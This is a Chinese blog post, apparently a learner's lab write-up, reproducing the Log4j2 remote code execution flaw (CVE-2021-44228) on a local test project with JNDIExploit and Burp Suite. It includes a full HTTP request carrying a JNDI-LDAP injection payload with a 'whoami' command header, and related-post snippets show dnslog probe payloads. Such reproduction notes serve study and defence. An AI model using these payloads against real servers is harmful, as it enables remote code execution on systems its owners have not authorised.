Log4j2 RCE(CVE-2021-44228)漏洞复现

已于 2022-02-23 15:37:36 修改
阅读量2.2k 收藏 3
点赞数
分类专栏: web笔记 安全笔记 文章标签: 安全 web安全
于 2022-02-23 15:31:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52444045/article/details/123091064
版权

Log4j2 RCE(CVE-2021-44228)漏洞复现

文章目录

准备环境

Log4j2这个漏洞是我第一次复现,因为还未学到javaweb方面的东西,就一直搁置着这个

项目文件下载
工具: JNDIExploit、burpsuite

首先把师傅给的项目文件运行一下
在这里插入图片描述

发现报错,这里有一行不完整,因为我也不清楚这里应该是什么就先忽略了。
在这里插入图片描述

忽略这行不完整的,可以正常运行

在这里插入图片描述

下面状态栏可以看到打开了8080端口,这应该就是漏洞存在的位置了。
在这里插入图片描述

打开后发现好像是404页面。我以为是我的问题,在这耽搁了比较久的时间。就去查找网上其他师傅们复现的文章和笔记。

在一篇文章中发现,之前那个404页面好像是正常运行之后的页面。

复现过程:

用JNDIExploit启动一个ldap的服务

在这里插入图片描述

这里发现HTTP服务无法开启,后来发现是端口冲突。换个端口就OK。

使用BP抓包工具构造一个请求

GET /hello HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
cmd: whoami

payload=${jndi:ldap://ip:1389/TomcatBypass/TomcatEcho}

看到这一步的时候发现之前忽略的项目内的一行,可能是请求内容中的最后一行的payload
在这里插入图片描述
将项目中的补充完整,重新运行。

BP发送构造的请求
在这里插入图片描述

可以看到回显。复现完成。

不足

在漏洞利用前应先验证漏洞是否存在,但是我根据教程中师傅的验证流程,使用dnslog没有验证成功:
在这里插入图片描述
在这里插入图片描述

总结

最后说一下这个漏洞的原理,引用其他师傅的一张图片
在这里插入图片描述

最后,注意到了项目中除了/hello这个路径,还有个/login
是通过POST方式传输username和password。猜想还有另外一种复现方法

参考文章:Apache Log4j2 RCE(CVE-2021-44228)漏洞复现

sec0nd_
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 687
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
Log4j2 RCE 简单复现
ChamZhiZe的博客
01-10 628
一:所以环境 java 1.8.0_u172+idea 注:高版本的java不行,最好是在java1.8.0_u140以前的版本复现。 二:复现过程 github上下载本次复现所需要的东西: 第一步 你需要知道你的IP地址,因为是本地复现,所以就是你本地的物理机IP,也可以是你服务器的IP地址,总之一定是自己的IP地址。你要是做一些坏事儿,铁手镯会带到你的手腕上,请你到里面喝喝茶。 第二步 开启你的LDAP服务,在文件加的POC文件夹下,通过cmd启动你的LDAP服务 java -jar JNDIExp
log4j2远程代码执行漏洞原理及复现
最新发布
m0_57967573的博客
04-29 1298
log4j2 框架下的 lookup 查询服务提供了 {} 字段解析功能,传进去的值会被直接解析。例如 ${java:version} 会被替换为对应的 java 版本。这样如果不对 lookup 的出栈进行限制,就有可能让查询指向任何服务
Log4j2 RCE漏洞复现
守拙的博客
12-10 4467
最新log4j rce漏洞复现
Log4j2_RCE漏洞复现
kukudeshuo的博客
12-20 1709
Log4j2_RCE漏洞复现 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html 复现过程 首先这里需要一台外网VPS服务器,然后在上面安装JNDI注入工具 打开题目 先使用dnslog进行测试 ${jndi:ldap://2c7b25a4.xxxxx.ceye.io/exp} 填在账号输入的位置即可,密码随便填 然后点击提交 可以看到笔者这边的dnslog平台成功返回一条记录,说明存在Log4j2_RCE漏洞 开启ldap和http服务
log4j2-rce-cve-2021-44228 漏洞复现
weicanh的博客
04-29 235
从 log4j 2.15.0 开始,默认情况下已禁用此行为。从版本 2.16.0(以及 2.12.2、2.12.3 和 2.3.1)开始,此功能已被完全删除。
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCECVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1...如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效
06-07
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效,非常好用老版的BurpSuite和新版的都可以使用。祝大家挖洞顺利(工具仅用于学习交流)
vulfocus Apache log4j2-RCE 漏洞复现CVE-2021-44228
qq_45780190的博客
12-15 4993
根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证 创建靶场后是这样一个页面。 使用payload验证,发现可以触发dnslog,可以确认可以利用 证明存在JNDI注入漏洞。 在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload,建立1389和8080端口的服务。用于远程命令执行使靶机来访问我准备好的EXP从而进行更安全的被动连接,
CVE-2021-44228——Log4j2-RCE漏洞复现
「 虚幻私塾」
01-20 640
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 0x00 漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3
Apache log4j2 RCE(CVE-2021-44228
不曾扬帆,何以至远方
07-16 473
Apache log4j2 RCECVE-2021-44228
渗透测试【一】:渗透测试常见问题
Guardian
11-26 1116
渗透问题汇总
最佳实践:解决 Swagger API 中的未授权访问漏洞
每天多一点干货
10-27 479
投的前端开发,base杭州,10.27上午人工第一面,被疯狂抠细节拷打,答的不太好晚上看了一下状态,从AI面试变成了二轮面试进行中所以,这是人工第一面过了,还是。12人一组,一清一北?坏消息,是顺丰的低价,设计岗在深圳那么点钱估计活不下去,xdm我要接吗还是等其他的,本人广东人, 目前满帮三面、615hr面,其他大大小小银行和联通等还在流程中。市场上有很多大厂,虽然打着同一杆大旗,但里面的业务五花八门,人员的福利体系也千差万别,拿到同一个大厂的offer,签约公司却很可能不一样,比如,腾讯、华为、阿里。
CVE-2016-7124漏洞复现
qq_54735393的博客
11-24 696
如果存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行
Swagger接口泄露漏洞风险
weixin_42581846的博客
12-19 3798
Swagger是一种用于描述API的工具,它可以使用OpenAPI规范来描述API的结构和功能。Swagger可以帮助开发人员更快地设计、测试和使用API,因此被广泛使用。 然而,如果没有适当的安全措施,Swagger可能会导致接口泄露漏洞。这意味着,攻击者可能会利用Swagger文档中提供的信息来攻击API或获取敏感信息。 为了避免这种风险,应该采取以下措施: 不要在Swagger文档中包含敏...
Apache Log4j2 Remote Code Execution (CVE-2021-44228)如何验证
06-06
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)可以通过以下步骤进行验证: 1. 构造一个恶意的日志信息,包含以下内容: ``` <appender name="RCE" class="org.apache.log4j.ConsoleAppender"> ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值